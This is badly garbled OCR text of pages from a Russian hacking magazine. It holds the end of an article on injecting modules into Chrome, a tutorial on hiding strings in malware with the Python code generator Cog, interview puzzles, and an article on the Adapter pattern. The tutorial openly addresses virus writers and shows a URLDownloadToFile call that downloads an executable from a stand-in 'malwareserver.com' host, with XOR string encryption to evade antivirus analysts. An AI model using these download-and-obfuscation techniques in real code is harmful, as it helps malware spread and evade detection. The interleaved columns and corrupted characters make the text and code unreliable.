просто не будет исnользоваться . В принциnе, чтобы не замо­ рачиваться с nоиском нужного nроцесса Хрома, можно nросто

внедрить модуль во все nроце ссы. Хуже от этого не будет. :Х:

092

ХАКЕР

03 /158/ 2012



. кодинг

Peter and the Wolf (peterandthewolffareal.xakep.ru l ·

~

И целого РАСШИРЯЕМ возможности ПРЕПРОЦЕССОРА

Одной из таких задач являет ся банальное скры т ие текстовых строк в коде пр ограммы. Скрывать их д ействительно н ужно -они однозначно помогают аверам и исследователям,

которым только дай поизмываться над очередн ы м вирусным чудом.

Др угое дело- как? Н у, шифровать, но как сделать эт о удобно? П ред­

ставь, ес ть у тебя пр ограмма с вот таким вот вызовом [утрирую] :

С/С++ С ПОМОЩЬЮ

URLDownloadToFile(NULL, "http: //malwareserver.com/ test .exe" , "C: \\test.exe" , е , NULL);

СТОРОННЕГО КОДОГЕНЕРАТОРА

URLD ownload ToFi le,

при сборке программы прекрасно поместятся

в сек ци ю .гdata или

.data

Обе с тр оки, передаваемые в параметрах к функции в открытом виде. Хот ь hех-редактором от­

крывай. В от ко д еры и извращаются, пишут отдель н ую пр ограмму,

шифрующую ст р оки, а потом п одс тавляют з нач ения с функцией ­ декриптаром как-нибуд ь так:

При разработке хакерских программ

URLDownloadToFile( NULL,

и утилит [особенно вирусного толка] часто

. . . " ), Decrypt( "\x 25 \x 5C \x 3A\x12\xe3 .•. " ),

Decrypt( " \x eE \x 12 \x 12 \x lб \x 5C

встречаются задачи, которые нереально

решить силами обычного препроцессора Си .

е,

NULL);

Это задачи, требующие вычислений, пусть

и тривиальных, но еще ДО компиляции.

Всё бы ничего, только вручную шифровать и в ставля ть каждую строчку - это геморрой . Было бы в ми лли о н раз приятнее нап и ­

Сегодня мы обсудим один более или менее

сать какой-нибудь макрос, который прямо тут же, пр озрачно для

универсальный способ решения подобных

тебя, шифровал бы строку. Однако препроцессор Си в со вр еме н ных ком п иляторах поддерживает очень о г раниченный набор директив,

задач ,с помощью Питона.

с помощью ко т орого строку целиком не зашифровать , как ни пытай­

ся. Чтобы не шифровать строки руками [а также автоматизировать ~~ а Е)

-.

"'

ill

t•

д ругие подобные процессы], надо придумать какой-то костыль.

--

1:.""-llloo""'"'._~ l- "" w.-Q ... .. ~ g !q, о!3 f'!f: !1

1 O Q Ol!iiiOfJ

•·-1!-

о - t~ -

"""-1

Сайт проекта

Cog

на сервера автора:

пedbatchelder.com/

code/cog. .... . .....uct . ...... , ......._ . . . , ... _

названием Cog [ http :Upypi . python . o гg / pyp i/cogapp ]. Автор на зывает

_...,,"1_.......,.....,..........................._,0"'""'-'"'"'''"""'""'''-

J

, . ,fl_ll/'/o 11111_6...,.1t"a\\<ooi,..., ' JIII

~ 1 "10oll\a.0<'\ . .1>\. . U\~.... \I/o lt\0.U\0.4r,081»\ . . I'I\Cio/d' l

1•111-111"1·

nn•-11· • Ь.!> ,

о.оо ,

оо.

... ..,.., ,

о.ос ,

,."11

о о 70 ,

.,... , ...,,

~.::~i:;~· -·

ro;;;-•a

,.....а...,.

О.>О,

.. ><.

О.1'1 ,

ОО.И ,

o.o r ,

hи ,

o.or,

Чтобы не копировать в каждый файл твоего проекта

Jf] o..J

•~·-

094

небольшие фрагменты программ на П итоне в качестве генера т оров

Cog 'a можно натравить на тв ой

сорец, и он н айдет в нем отмеченный специальными метками код

опи сы ваемые

в первом

на Пит оне, выполнит е г о и в с тавит результат обратно в исходный

внедряемом

код . К п римеру, скормим

засунуть их в сво й руthоп-модуль и и с пользовать его

Процесс смешанной разработки

е г о инструментом для кодогенерации, п озволяющим испол ь зовать

в исходниках. В общем, так и есть,

функции,

фрагменте , можно

· - ~ - -~ ·-... ., -.,1~ .... -

сипед, в этой статье мы этого делать не буд ем, а воспользуемся го­ товым и уже заточе нн ым п од наши цели продуктом-костылем под

••

·~~.=="' -·· "'- ·- ·-· · -· ·

# !11_ ... _ , ...............

КОДОГЕНЕРАТОР НА РУТНОN Несмотря на то, что хакеры всегда и везде любят изобретать вело­

вместо модуля

/1

Cog'y в от такой файл и к :

Это обычный файл С++

cog .

/* [[ [cog

ХАКЕР

03 /15В/ 2012


И целого Си мало

import cog fnames = [ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

]]] */ 1J [ [ [ end ] ] ]

В результате файл будет модифицирован вот так :

/1

Это обычный фай л С++

/ * [[[cog import cog fnames = [ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

Выполнив коман д у

python.exe cog.py -r test.cpp,

где

ными строками!

URLDownloadToFile( NULL, //[[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]J Decrypt( "\exeE\exl2\exl2\ex16\0x5C ••. " ) /* [[ [ end] ]] */ , // [ [[ cog Encrypt( "C:\\test.exe" ) ] ] ] Decrypt ( "\0x25\0x5C\0x3A\0x12\0x03 •.• " ) 1* [ [ [end]] ] */ , е,

NULL); Чтобы не запускать ко д а г енератор вручную, можно в

] ] ] */

Studio

void DoSomething(); void DoAnotherThing(); void DolastThing(); // [ [ [ end] ] ]

Между метками

[[[cog

test.

срр- это н аш файл, мы п о л у чим исходный код с уж е зашифрован­

Visual

добавить его в список коман д , вызыва емых перед компи­

ляцией твоего проекта. Те перь если ты захочешь изменить зна­ чение шифруемой строки, д ос тат очно прост о п оме нять параметр Encгypt в соg-скрипте, вручную вставлять ничего не пр и д ется.

и

]]]

располагается код на Питоне,

Пр и использовании такого мощного ин струме нта как П итон, воз­

генерирующий код на Си, который будет вставлен в строки между

можностей для кодагенерации о т крывается уйм а . Наприм е р ,

метками

может раз и навсегда заменить утоми тельное использование

]]]

и

[[[end]]] . Если Cog

запустить заново, то он сначала

удалит старый сгенерированный код на Си, а потом снова выполнит код генератора и запишет новый результат в файл. Как ты, наверное, заметил, помимо специальных маркеров код

Cog

biп2h для внедрения бинарных файло в в исходный код пр о грам­ мы. Для этого достаточно реа ли зоват ь функцию biп2h и в ста вить ее, как и в примере выше, в п ервый фрагмент кода на Питоне :

на Питоне еще выносится в комментарий. Это нужно для того , что­

бы компилятор Си не пытался скомпилировать еще и код на Питоне -у него не получится.

Для вывода результата кодагенерации используются функции

out и оutllаналогичен out, только добавляет перевод строки в ко­ нец) модуля cog. Если в исходном коде есть несколько фрагментов на Питоне, они будут выполняться как один руthоп - скрипт. Следовательно,

def bin2h(filename, valuename): data = open(filename, 'rb' ).read() cog.out l ( BYТE %s[] {о % valuename) for byte in data : cog.out( оех%е2Х, % ord(byte)) cog.outl( '}' ) cog.outl( 'DWORD %s_size = %d;o % (valuename, len(data))) 0

необязательно везде делать импорт модуля и тому подобное.

Теперь, когда мы захотим засунуть бинарник в наш сорец !это пригодилось бы в статье про разработку РЕ- у паковщика) , то на­

ШИФРОВАНИЕ СТРОК Давай теперь попробуем написать скрипт для скрытия текстовых

пишем так:

строк из кода программы. В начале нашего исходника на Си за­ грузим модуль

Cog

и определим функцию шифрования- пусть это

будет обычный хог:

Что преобразуется в нечто вроде этого:

/* [ [ [cog import cog key = ехбб . def Encrypt(str): cog.out( 'Decrypt( "' ) cog.out( "" .join([ '\\ 0 +

// [[[cog bin2 h( "test.biп" , "test" ) ] ] ] ВУТЕ test[) = { ех2з , ехб9 , ехбЕ , ехбЗ , ехбС ...

11 ( " ех%е2Х "

длинный буфер

% (ord(char) л key))

for char in str])) cog.out(

/ /[ [[cog bin2h( "test.bin" , "test" ) ]]] /* [[[end])] */

о") о )

]]] [[[en d] ]] */

DWORD test_size = 7079 ; / * [[[end])] */ , В функцию

bin2h

можно добавить функцию шифрования или

сжатия- по вкусу.

Теперь можем заменить строкавые параметры

URLDownloadToFi le на

вызовы

Encr ypt:

ЭТО НЕ КОНЕ Кодер, занимающийся вирусами, может придумать миллион о чень

URLDownloadToFile( NULL, // [[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]] /* [[[e nd]] ] */ , / / [[[cog Encrypt( "C:\\test .exe" ) ]]] / * [[[ end]]] * / ,

милых применений стороннему кодоге н ера тор у. Это может быть рандомизация т ех или иных вызовов, разбавление кода высоко­ уровневым мусором, подсчет хеш ей име н функций для соо твет­ ствующего поиска

API

и так далее . Можно даже с п омощью СагеРу

генерировать ассемблерный ко д , тут же его как -ниб удь видоиз­ менять и встав лят ь в уже скомпилированном виде - фантазия

е,

ограничивается только возможностями Пит она со вс ем многооб ­

NULL);

разием его модулей . ::х::

ХАКЕР

03/158/2012

095


со еседованиях ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, КОТОРЫХ ДАЮТ НА СОБЕСЕДОВАНИЯХ В этом выпуске я добавил к обещанным в

УСЛОВИЕ

прошлый раз задачам шесть задачек на

Встретились д в а старых друга, не видевшиеся уже довольно да в но.

сообразительность и логику. Как показывает

-Я слышал, у тебя дети появились.

практика, их очень любят работодатели.

-Д а, три сы н а.

Конкретно этот набор логических задач мне дали на собеседовании в одной крупной интернет- компании. На решение всего перечня

отводилось

40

минут- я почувствовал себя

как в школе на контрольной .. .

Оба когда-то вместе учились на Физтехе. Вот их д иалог:

-И сколько им л ет? - Ну ... В сумме тринадцать!

- Хм ... За г адками хочешь говорить? Н у ладно. И что еще можешь сказать?

-Если их возрасты перемножить, получится как раз столько, ско л ько око н у в о - о-он того д ома.

-Н о зто г о в сё е щ е мало!

-Мо г у д обавить, ч т о мой с т ар ш ий сын рыжий.

-Ну, теперь совсем другое дело . Им

... [далее сле д ует ответ!

-П равильно!

Сколько же лет было каж д ому сыну?

096

ХАКЕР

03/158/2012


Задачи на собеседованиях

РЕШЕНИЕ

УСЛОВИЕ

Возможно, первый же у точняющи й в о пр ос, который возникнетутебя

Есть три урны с шара ми, как в за дач ках по теории вероятности. Н а

в связи с этой задачей, будет о т ом, как счи тать ок на «у во - о - он того

перво й написано << ЧЕРНЫЕ >>, на втор ой - « БЕЛЫЕ >>, на третьей­

дома>>. Ответ: это известно лишь у частни кам беседы.:] Но мы неб у­

«Ч ЕРНЫЕ И БЕЛЫЕ >>. В о дн ой, соответственно, ле жа т белые шары,

д ем уныва ть и составим все возможные варианты количества окон.

в др у г ой - черные, в оставшейся- и черны е, и белые. Однако все

П ока главное ус лови е- сумма множителей должна быть равна

надписи на ур на х заведомо ложны. Разр е шае тся д ос тать тольк о

13:

о д ин шар тольк о из о дн ой ур ны . Как определить, в какой ур н е какие

1 1 1 1 1

• • • •

*

1 •

2

1 2 3 4 5 б

* * * * *

2 2 3 2 4 5 2 3 3 3 • 4 3 • 5 4 • 4

• 11 =· 11 • 1е = 2е • 9 27 • 8 32 • 7 35 • б 36 * 9 36 • 8 48 56 • 7 • б бе • 7 б3 • б 72 • 5 75 • 5 8е

шары лежат?

РЕШЕНИЕ Из того, что н а дписи заведомо л ожны, можно с делать следующие выводы :

в ур не «Ч ЕРНЫЕ>> либотолько бе лые шары , либо черные и белые; в урне « БЕЛЫЕ >> либотолько черные шары, либо черные и белые;

в урне « ЧЕРНЫЕ И БЕЛЫЕ >> либотолько белые шары, ли бо т олько черные

.

Е с ли мы возьмем шар из ур ны « ЧЕРНЫЕ И БЕЛЫЕ >> и он окажется ч ерным, значит, в э той у рн е ТОЛЬКО ч ер ные шары. Это однозначно указы вает на то , что:

в у рне « БЕЛЫЕ» черные и белые шары, так как только черные у нас в урне « ЧЕРНЫЕ И БЕЛЫЕ >>;

Вариантов оказалос ь н е та к много, их можно выпи сать за не­

в урне « ЧЕРНЫЕ >> только белые шары, так как черные и белые в

сколько минут. Заметь, что пр оиз вед е ния возрастов совпадают

то ль ко в дв ух случаях:

1*6*6 и 2*2*9.

урне « БЕЛЫЕ>>.

Пол у ча е тся, что если бы з д а ние

имело л юбое пр е длож е нн ое ко личе с тво око н , кроме

36, то

ответ

можно бы ло бы дать сразу, однако о дин из др узей сказал, что «этого

Н у и соответствующие выводы можно сделать, вынув не ч ер ны й

шар, а белый . Таким образом , в озмож ны х распределений шар ов

всё е щ е мало >>. Это однозначно подводит нас к мысли, чт о сыно вьям

всего два:

либо од и н год, ш есть лет и ше с ть лет, либо два года , два год а и девять

1. 2.

лет. Далее наш папаша выдает с ледую щ ую фразу: «Мо г у до ба вить ,

БЕЛЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

БЕЛЫЕ

что мой с тарший с ын рыжиЙ >>. Сначала она выглядела совершенно бес п о ле з н ой, но сей ча с всё с тало понятно. Главное с л о в о в н ей н е « рыжий>>, как могло пока за ться на первый взгляд , а «стар ш иЙ>>. Из

наших варианто в

В зависимос ти о т т о го, какой шар мы вын ем из третьей урны, будет иметь мес т о либо первое, либо втор ое.

[1-6-6 и 2-2-9] толь ко в одном имеется старший сын.

Сле д ова те льно, правильны й ответ- два года , два года и девять лет.

УСЛОВИЕ В базе данных Огасlе имеются две та б лицы с о динаковым на бо р ом

УСЛОВИЕ

колонок. Выведите данны е, которые есть в одной таблице, но о т­

Дан большой массив данны х в файле [миллион записей]. Задача:

сутствуют в другой.

загрузи ть данные в таблицу, используя язык программирован ия

РЕШЕНИЕ

Pythoп .

Д ля ясности опре дел имся с форматами таблиц. Следующие два

РЕШЕНИЕ

запроса создают две одинаковые таблицы с именами

test1

и

test2,

В качест ве СУБД для разнообразия используем Огасlе . Для работы

которые содержа т информацию [наименов а н ие пр о дук т а и ц е на] о

с н ей в Питоне пред усмотрен специальный модуль сх_Огасlе, кроме

какой -ниб удь абстрактной прод ук ции:

него на нашем компьютере об язательно д о л ж на быть клиентская

часть СУБД Огасlе .

CREATE TABLE testl(prod VARCHAR(le), price INT); CREATE TABLE test2(prod VARCHAR(1e), price INT);

import cx_Oracle Для решения этой за д ачи нам нужно использовать о дин и з опе­

#

раторов се мейства

Соединяемся с базой

со пn

= cx_Oracle.connect(' system/ qwerty@XE' ) cur = coпn.cursor()

JOIN , которые

позв о ляют объе динять не ско лько

колонок из разных таблиц в о дн у. В нашем с л уч а е использование LEFТ

JOIN

обус л овлено т ем, что мы должны выбрать все записи из

левой таблицы [первой], чтобы понять, какие из них отсу тств уют в

#

Через механизм итераторов nострочно добавляем записи из

файла

правой [второй]. Условий объе динения таблиц у на с будет два- п о количест в у столбц о в . Соответственно, для более с ложны х таблиц

в таблицу

for line in open( 'file.txt' ) : cur. execute( "INSERT INTO test VALUES { :s) " , s=line)

н уж но пер еч ислить все сто лбцы . В конце д е кларир у ем условие

«WHERE test3.pгod IS NULL>>, которое

означает, что нас интересу­

юттолько записи, отсутствующие во втор ой таблице. Пр и т аком

#

Сохраняем изменения,

закрываем соединение

объедине нии о ни да ют пустое з н ачение:

c ur .ex ecute{ 'COММIT' )

cur. close() Хо ч у о т метить, что при добавлении данны х в более с ложные

5ДЕСТ testl. * FROM testl LEFТ ..JOIN test3 ON test1.prod=test2.prod AND test1.price=test2.price WHERE test2.prod IS NULL;

таблиц ы с индексами и ключами л уч ше предварительно отключить их на время, та к как н а их пересчет может уйти много времени . В

Е сли у нас в таблице есть у никальный идентификатор записи, то

качестве альтернативы можно загружать данные че ре з временн ую

указы вать его при запросе в усло вии для

таблицу.

та к как товар и цена вп о лн е могут быть о динак овыми, а идентифи-

ХАКЕР

03 /158/ 2012

JOIN,

в принципе, не надо,

097


КОДИНГ

последовательных чисел. Правильно- между ними. А так как мы·

ЗАДАЧИ В СЛЕДУЮЩЕМ ВЫПУСКЕ

рассматриваем только последовательные простые числа, то между

ними ещё одного простого числа быть не может. Следовательно, полусумма двух последовательных простых чисел, начиная с трех,

число составное. Что и требовалось доказать.

1.

Написать функцию, которая будет получать на входдва списка и возвращать словарь, в котором ключи- элементы п ервого

списка,'а значения - элементы второго списка или Nопе, если соответствующий элемент отсутствует.

Необходимо:

>>> а = [ "а" , "Ь" , "с" ] »> ь = [ 1, 2 ] >>> print dictify(a,b) { "а" :

1,

"Ь" :

2,

"с" :

УСЛОВИЕ Возникло подозрение, что один из твоих веб - серверов взломан. а.

проверить систему на предмет руткитов,

б.

на будущее настроить уве домлени е администратора о малейшей подозрительной активности, возникающей на сервере или на­ правленной на него .

None}

РЕШЕНИЕ

2.

Есть следующая функция:

Сперва следует определиться, что за ОС стоит на сервере . В случае, если сервер под *пiх, я бы воспользовался такой

def myappend(a = [], num a.append(num) print а

пр ограммой, как chkгootkit. Она не только проверяет систему на

0 ):

наличие руткита в, но и выявляет аномальную активность, напри­

мер удаление записей из сис темны х журналов. Chkгootkit есть

Определить, что будет проис ходить при выполнении следующего кода и почем у:

»> »> »> »> >» »> »>

а

в репазитариях большинства дистрибутивов, так что проблем с ее уста новкой возникн у ть не должно. Ещё две альтернативные программы с похожим функцианалом-это гkhuпteг и

=

unhide . Для

винды существует г ораз до больше ПО, обнаруживающего руткиты.

[ 1 , 2, 3] myappend(a) myappend() myappend() а = { 1 : 2, 3 :4 } myappend(*a) myappend(**a)

Полный список таких программ смотри по ссылке http:!/goo.gi/9HXEt . Из популярных могу порекомендовать

GMER

или

RootRepeal.

Кроме

того, если сервер находится в корпоративной сре де , в ней наверня­ ка централизованно развернуто ПО какого-либо антивирусного вен­ дара, которое практически всегда имеет в своем арсенале модули

для борьбы с руткитам и. Решить задачу с уведом лением системного администратора о разнообразной подозрительной активности

3.

Написать класс, который хранит список своих экземпляров и по­

поможет спе циальное ПО под названием « система обнаружения

вторжений» IIDS- intгusion detectioп systeml . В настоящее время

зволяет итерировать по ним.

существует целый класс таких систем. Нужно выбрать т у систему, которая подходит по требованиям. Для отдельно стоящего сервера

»> а = Keeper() »> ь = Keeper() »> for i in Keeper.list_instances(): print i <K eeper instance at

ех

я бы использовал классический Sпогt или же более современную Suгicata . Это ПО с открытыми кодами, а сле д ова тельно, оно распро­

...

страняется бесплатно. Для обнаружения подозрительных действий с веб-сервером используются файерволы уровня веб-приложения

4.

IWAF- we b application fiгewa l li, которые могут быть встроены в

Что это и что с этим можно сделать?

конкретное приложение или представпять собой отдельное ПО.

389/tcp

open

ldap

(Anonymous bind

ОК)

УСЛОВИЕ В центре идеально круглого озера плавает утка, а на берегу си дит лиса . Утке нужно улететь, но она может взлететь только с берега . катары разными просто потому, что они были добавлены в таблицы

Скорость лисы в четыре раза больше скорости утки . Лиса хочет

в разном порядке или в разное время.

съесть утку, но не умеет плавать. Сможет ли утка спастись от лисы?

УСЛОВИЕ Доказать , что полусумма дву х nоследовательных пр остых чисел, начиная с трех, представляет собой составное число .

РЕШЕНИЕ Пер сенажи в задаче могут варьироваться !вместо лисы- орк, а вместо утки - хоббит в лодке и т. д . l, но смысл остается тот же. Ещё добавлю, что речь идет о максимальной скорости лисы, но она с

РЕШЕНИЕ П онятие составного числа мы встречаем не каждый день, поэтому

позволю себе напомнить определение: составное число- это на­ туральное число больше единицы, которое не является простым . Рассмотрим закономерность:

ус пехом может двигат ься с меньшей скоростью или вообще ждать, иными словами, она Идеально Логичное Существо.

Для решения задачи нам нужно вспомнить формулу длины

1= 2 * pi * R, где R- радиус окружности. Очевидно, что для получения максималь­ окружнос ти , ведь именно по ней будет бегать лиса:

ной форы утке необходимо стартовать в противоположную от лисы

3 + 5 = 8 5 + 7 = 12 7 + 11 = 18

сторону. В таком случае утке нужно будет проплыть расстояние

а лисе пробежать

1/2, то

R,

есть pi * R. Скорость лисы в четыре раза

больше скорости утки, но расстояние, которое ей нужно преодолеть, всего лишь в

3,14 раза

больше, чем расстояние, которое н уж но про­

плыть у тке , поэтому лиса раньше окажется в том месте, куда должна

Отсюда видно, что все простые числа нечетные, а два нечетных

попасть утка. Следовательно, утке не суждено улететь. Казалось

числа в сумме дают четное, поэтому полусумма простых чисел­

бы, всё достаточно просто, но не тут-то было! Это я понял , когда на

это натуральное число, то есть дробной части оно не имеет. Теперь

собеседовании мне задали вопрос: <<А существует ли стратегия, по­

представим, где на числовой прямой расположена пол усумма двух

зволяющая утке в конце концов доплыть до бе рега и улететь?»

098

ХАКЕР

03/158/2012


Задачи на собеседованиях

Да , такая стратегия су щ ествует, и вот в чем она заключается. Для простоты предположим, чт о радиус озера четыре метра. П ер в ое,

#

Формируем очере~ь

urlsPool

URL

= Queue.Queue( e )

что нужно с д елать у т ке, - зто выпл ы ть на окружность с рад иусом в

#Кладем URL'ы в очередь

четыре раза меньше исходной la если быть совсем точным, с радиу­ сом г < 3/pi * R/41 и с центром в той же точке таким образом, чтобы

for url in open(sys.argv[- 1], 'r' ): urlsPool . put{url)

оказаться на м аксимальном удалении о т ли сы. Утка, ц е нтр озера и

#

лиса д о л жны находиться на о дно й прямой. Утке уда стся з т о с делать,

for

так как ее угл овая скорость при дви же нии п о окружности с радиу­

сом R/4 будет выше, чем у лисы. Стало бы ть , утке до берега оста­

Запускаем nотоки

х in xra nge(threads): DownloadThread() .start() urlsFile .c lose()

нется только три ме тра , а лисе н еобходим о будет про бежать в сё те

же

1/2, т о есть 12,56 метра 12 * 3,14 * 4/21. Ра ссто яние , которое нужно

УСЛОВИЕ

преод о леть ли се, уже более чем в четыре раза превыша ет путь у тки ,

Есть дв е изо лированны е др у г от др у га комнаты. В о дной н ахо дят ся

а с л е д о вательно , у т ка с п асена ' В об щ ем случае утке нужно выплыть

три лампочки, в др угой -три выключателя. Ты стои шь в комна те с

на окружность радиусом г< 3/pi

* R/4 метра так,

чтобы лиса, центр

выключателями и можешь перейти в комнату с лампочками только

окружнос ти и утка оказа ли с ь на одной прямой . А дальше двигаться

один раз. Необходимо определить, какая лампочка каким выключа­

по кратчайшему пути к берегу!

т елем включается.

Р.

Доп о лнит ельное за дание для гурманов:

S.

РЕШЕНИЕ

1.

Каким об р азом можно максимизировать отрыв утки от лисы?

2.

При каком соотн о ш ении скоростей лиса гар антиро ванн о поймает

Н аверное, про э т у за дач ку слышали если н е в се, то многие. Р е ш а ­

утку?

ется она достаточно просто !если вспомнить, что горящие лампочки имеют свойс тво нагреваться]: 1. Включаем один из выключателей ! доп устим, первый].

УСЛОВИЕ Написать скрипт, считывающий список URL из файла !одна строка - о дин URLI, скачиваю щи й их не более чем в N потоков и сохраняю­ щий каждую с тр аницу в отдельном файле.

N, за д аваемое аргумен­ 10. Имена конечных

2. 3. 4.

том командной строки, п о умол ч анию равно

Ждем неко тор ое время, п ока поверхностьлампочки нагреется. Выключаем э т у лампочку. Включаем второй выключатель и идем в другую ком нат у смотреть на лампочки.

файлов значения не имеют. Для реализации многопоточности использо вать на выбор о дн у из стандартных библиотек thгeadiпg , eveпtlet, geveпt,

Twisted

или любую другую з на комую тебе библио ­

Итого имеем: за ту лампочку, которая горит, отвечает только что

включенный выключатель !второй]. Трогаем выключен ны е лампоч­ ки. Теплая лам поч ка включается с п омощью первого выключат еля .

теку.

А та, которая не г о рит и хо л о дная , - с помощь ю третьего.

РЕШЕНИЕ Я не стал особо выпендриваться и реализовал скрипт с использо в а­

УСЛОВИЕ

нием стан дартн ой thгeadiпg:

В одной бутылке литр вина, в др угой литр воды. Из первой во вторую перелили ложку вина , а затем из второй в п ервую перелили ложку

import import import import

получившейся смеси. Чего тепер ь больше: воды в бутылке с вином

sys threading Queue urllib2

или вина в бутылке с водой? Вино и вод у не перемешивали.

РЕШЕНИЕ Для большей наглядности возьмем ложку вместимостью

#

Класс

потока,

скачивающий

страницу

class DownloadThread(threading . Thread): def run(self): #

Прописываем хидеры для

headers

=

I

=

900

мл

вина

1еее мл воды

+

1ее мл вина

I

бутылка:

900

II

бутылка:

1еее мл воды

мл

вина

+ 1ее мл смеси + 1ее мл вина -

1еемл смеси

страницы

urllib2.Request(urlsPool .get(),None,headers)

Пишем в отдельный файл

Выдаем справку,

После второго переливания:

б.е)' }

logfile.write(urllib2.urlopen(req).read()) logfile . close() #

П о­

{ 'User-Agent' :

Запрашиваем содержимое

req #

бутылка:

п бутылка:

запроса

'Мozilla /4 . 0 (compatiЫe; МSIE 7.0; Windows NT while urlsPool.qsize() > е : logfile = open(str(urlsPool.qsize()), ' w' )

#

100 мл.

сле первого переливания имеем:

если скрипт запущен без аргументов

П олучается, ч то в смеси 10 частей воды и 1 часть вина или же 100/11 мл вина и 1000/11 мл воды . С учетом этого перепишем послед­

нее выражение !позволю себе убрат ь «МЛ» для большей компак т­ ности ]:

I

бутылка:

if len(sys.argv) < 2: print 'Usage : downloader.py [-n <number >] FILE \ n\ "- n <number>" - number of threads (default 10)' sys.exit( 1)

п бутылка:

I

бутылка:

#

II

бутылка:

Обрабатываем возможный аргумент с

количеством nотоков

if len(sys.argv) == 4 and sys.argv[ 1] threads int(sys.argv[ 2]) else : threads 10

==

(9ее (1еее

+ 100/ 11) вина + 1000/ 11 воды - 1000/ 11) воды+ (1ее - 10/ 11)

вина

П осчитаем дроби:

909,09 909,09

вина

вина

+ 90,91 + 90,91

воды

воды

'-n ' : Как видно, смесь в бу тыл ках оди н ако вая ! Но зто можно бы ло понять и гораздо проще : подумай, ведь объем жи д кос т и в бу тыл ках в итоге остался одинаковым - о дин литр, а значит, и сами смеси

должны быть одинаковыми. ::Х:

ХАКЕР

03 /158/ 2012

099


КОДИНГ

МЕНЯЕМ

ИНТЕРФЕЙСЫ КЛАССОВ БЕЗ УЩЕРБА ДЛЯ ЗДОРОВЬЯ

deeonis [deeonislagmail.com[ ·

а в ай представ им, ч т о несколько лет назад мы написали

некий парсер, который собирает опре д е л е нн ую инфор­ мацию с нужных сайтов. Дляп арсинга НТМL- стра н и ц мы использовали стороннюю библиотеку, ко то рая тогда о тл ично справлялась со своими задачами. Но во т п рошло некоторое время, и с т арый заказчик, для которого мы соз д али н а ш чуд о -п ро д укт, ре ­

шил напомни т ь о себе и по п росил до бавить парочку-другую н о вы х функций . Мы с задором взялись за работу, но буквально сразу по­ няли, что библиотека для разбора НТ М L- ко д а уже д ав но ус т аре л а и не поддерживается. Зато в открытом доступе есть аналог с кучей свистелок и блестяшек, который к тому же работает быстрее и с т а­ бильнее. Н о есть одна проблема- ин т ерфейсы у классо в нов ой

Разработка и поддержка большинства систем

библиотеки п ол н остью отличаю т ся от тех, которые м ы использо­ вали ранее. Более того, некоторые методы с та рого НТМL-дв ижка

ведется в течение многих лет. Кодовая база

не имеют анало г ов в новом. Нет, сделать ч т о -т о п одобное можно,

растет как на дрожжах, а взаимосвязи между

обработать результат их работы. Всё это на в о дит на мысль, ч т о

компонентами программнога обеспечения

добавить пар у новы х фич буде т не та к п росто, как на м это показа­

становятся всё сложнее и изощреннее. Зачастую при обновлении отдельных участков кода перед

программистами встает проблема рефакторинга всего проекта целиком . Для того чтобы этого избежать, создан паттерн « Адаптер», о котором мы сегодня и поговорим .

100

но для этого н ужно вызвать несколько функций и правильно

лось вначале. Однако, так как мы п роек т ирова ли наше прил ожение в 00 -стиле, нам на помощь придет паттерн <<Ада пт ер», ко т орый избавит нас от переписывания кучи старого кода .

ПАТТЕРН «АДАПТЕР» Чтобы понять , как работает наш спаситель ный паттерн, до­

статочно представить какой- н ибуд ь п ерехо дни к, например, для элек т ро пр иборов из С Ш А, который п оз в о ля е т воткнуть ш татовскую вилку в е вр опейскую розетку . Пр ограммный адаптер д е ла ет при-

ХАКЕР

03/158/2012


Паттерны «Адаптер>> и «Фасад>>

мерно то же . А если конкретнее, то он преобразует один интерфейс

puЬlic

IHTMLParser

вызова в другой . Единственная его цель - сделать так, чтобы клиент не заметил, что он обращается совсем к дру г ой библиоте­ ке, и тем самым избежать трудоемкой и в какой-то степени даже

private : ModernHTMLParser &m_modernParser;

опасной процедуры изменения кода.

puЫic :

Д ля начала давай взглянем на то, что у н ас было раньше.

HTMLAdapter(Modern HTMLParser &parser) { m_modernParser = parser;

Наша програ~а в первой версии (используется устаревшая библиоте к а для парсинга

1/

HTML)

}

Интерфейс парсера

char * get Tags() {

11 . ..

class IHTMLParser

m_modern Parser.getHtmlTags();

{

11 . .•

11 char * getтags ()

};

е·

'

11 ...

/1

}

/1

Класс,

р еализующий

class HTMLP arse r :

и нт ерфейс

puЫic

/ / Кл ие нт ский код ModernHTMLParser &modernParser = new ModernHTM LParser(); I HTMLParser * parser = new HTMLAdapter(modernP arser); parser->getTags();

IHTMLP arser

11 char * getTags() // Р еализация

метояа

Клиентский код не претерпит практически никаких изменений.

};

Н у, разве что придется создать объект класса HT M L Adapteг и пере­

11 } // Клиентский код IHTMLParser *parser parser->getTags();

дать ему в качестве параметра ссылку на Моdегп НТ МL Р агsег. Используя композицию,тоестьпередаваяобъектадаптируемого класса по ссылке, мы повышаем общую гибкость системы .

new HTM LParser();

В общем случае код адаптера может модифицировать результа­ ты, получаемые от адаnтируемого класса. Так, если, например, ме­

Как мы видим, тут всё довольно просто. Е сть некий класс

тод getТagsll класса НТМ L Рагsег возвращает массив НТ М L-тегов,

Н Т МL Р агsег, реал и зующий соответст в ующий интерфейс. Клиент­

используемых в разметке страницы, а ме т од get Htm iTagsl l класса

ский код создает объек т, ко т орый поддерживает э т о т ин т ерфейс,

ModeгnHTMLPaгseг возвращаеттоже самое, но в виде вектора, то

а затем обращается к его разнообразным методам. Но теперь

реализация метода getТags в HTM L Adapteг создаст массив на осно­

у нас есть ModeгnHTMLPaгseг, который никак не поддерживает

ве полученного от новой библиотеки вектора.

IHTM L Paгseг. Д ля того чтобы исправить этот недочет, мы создадим класс, который будет поддерживать IHTMLPaгseг, при этом деле г и­

Изменение результатов работы адаптируемого класса

руя выполнение его методов н овой библиотеке . Этот новый класс

class HTMLAdapter (Moder nHTMLP ar ser &parser): puЫic I HTMLParser

истанет а д а п тером.

Адаптер для

ModernHTMLParser class ModernHTML Parser

private : ModernHTMLParser &m_modern Parser; puЫic :

HTMLAdapter(ModernHTMLP arser &parser) { m_moder nP arser = parser;

11 std ::vect or <char *> getHtmlT ag s ();

11 . . .

char *

11

Адаптер,

р еализующий

